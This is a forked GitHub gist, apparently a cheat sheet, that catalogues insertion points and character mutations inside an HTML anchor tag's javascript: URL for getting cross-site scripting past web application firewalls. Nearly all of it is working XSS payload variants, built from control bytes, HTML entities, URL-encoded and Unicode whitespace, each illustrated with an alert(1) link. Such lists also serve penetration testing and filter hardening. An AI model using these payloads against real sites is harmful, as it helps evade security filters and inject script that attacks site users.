Skip to content

Instantly share code, notes, and snippets.

@0xSojalSec

0xSojalSec/mutation_a.txt

Forked from hackerscrolls/mutation_a.txt
Created February 12, 2023 17:19
Show Gist options
  • Star 18 You must be signed in to star a gist
  • Fork 4 You must be signed in to fork a gist
  • Save 0xSojalSec/461bccca9fc927ea2de39943178ca3eb to your computer and use it in GitHub Desktop.
Save 0xSojalSec/461bccca9fc927ea2de39943178ca3eb to your computer and use it in GitHub Desktop.
Download ZIP
Mutation points in <a> tag for WAF bypass
Raw
mutation_a.txt
<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">
[1]
Bytes:
\x09 \x0a \x0c \x0d \x20 \x2f
<a/href="javascript:alert(1)">
<a\x09href="javascript:alert(1)">
[2,3]
Bytes:
\x09 \x0a \x0c \x0d \x20
<a href\x20="javascript:alert(1)">
<a href=\x20"javascript:alert(1)">
[4]
Bytes:
\x01 \x02 \x03 \x04 \x05 \x06 \x07 \x08 \x09 \x0a \x0b \x0c \x0d \x0e \x0f \x10 \x11 \x12 \x13 \x14 \x15 \x16 \x17 \x18 \x19 \x1a \x1b \x1c \x1d \x1e \x1f \x20
HTML Encoding:
&#x01; &#x02; &#x03; &#x04; &#x05; &#x06; &#x07; &#x08; &#x09; &#x0a; &#x0b; &#x0c; &#x0d; &#x0e; &#x0f; &#x10; &#x11; &#x12; &#x13; &#x14; &#x15; &#x16; &#x17; &#x18; &#x19; &#x1a; &#x1b; &#x1c; &#x1d; &#x1e; &#x1f; &#x20;
<a href="&Tab;javascript:alert(1)">
<a href="&#x001;javascript:alert(1)">
[5]
Bytes:
\x09 \x0a \x0d
HTML Encoding:
&#x09; &#x0a; &#x0d;
<a href="javas\x09cript:alert(1)">
<a href="javas&Tab;cript:alert(1)">
[6]
Bytes:
\x09 \x0a \x0b \x0c \x0d \x20 \x21 \x2b \x2d \x3b \x7e \xa0
URL Encode (bytes):
%09 %0a %0b %0c %0d %20 %21 %2b %2d %3b %7e %a0
HTML Encode (bytes):
&#x09; &#x0a; &#x0b; &#x0c; &#x0d; &#x20; &#x21; &#x2b; &#x2d; &#x3b; &#x7e; &#xa0;
UTF-8 Symbols:
\u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff
URL Encode (UTF-8):
%e1%9a%80 %e2%80%80 %e2%80%81 %e2%80%82 %e2%80%83 %e2%80%84 %e2%80%85 %e2%80%86 %e2%80%87 %e2%80%88 %e2%80%89 %e2%80%8a %e2%80%a8 %e2%80%a9 %e2%80%af %e2%81%9f %e3%80%80 %ef%bb%bf
HTML Encode (UTF-8):
&#x1680; &#x2000; &#x2001; &#x2002; &#x2003; &#x2004; &#x2005; &#x2006; &#x2007; &#x2008; &#x2009; &#x200a; &#x2028; &#x2029; &#x202f; &#x205f; &#x3000; &#xfeff
<a href="javascript:~alert(1)">
<a href="javascript://%0d%0aalert(1)">
<a href="javascript:\x0calert(1)">
<a href="javascript:%ef%bb%bfalert(1)">
<a href="javascript:&#xfeff;alert(1)">
-----------------------------------------
We use char codes to show non printable symbols
\x00 - ASCII hex code
\x20 - SPACE
\x0a - NEW LINE
\u0000 - UTF-8 char code
\u1680 - OGHAM SPACE MARK
\u2028 - LINE SEPARATOR
Encoding UTF-8 to URL isn’t obvious:
\u1680 -> %e1%9a%80
\u2028 -> %e2%80%a8
@norahul1020
Copy link

Useful

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment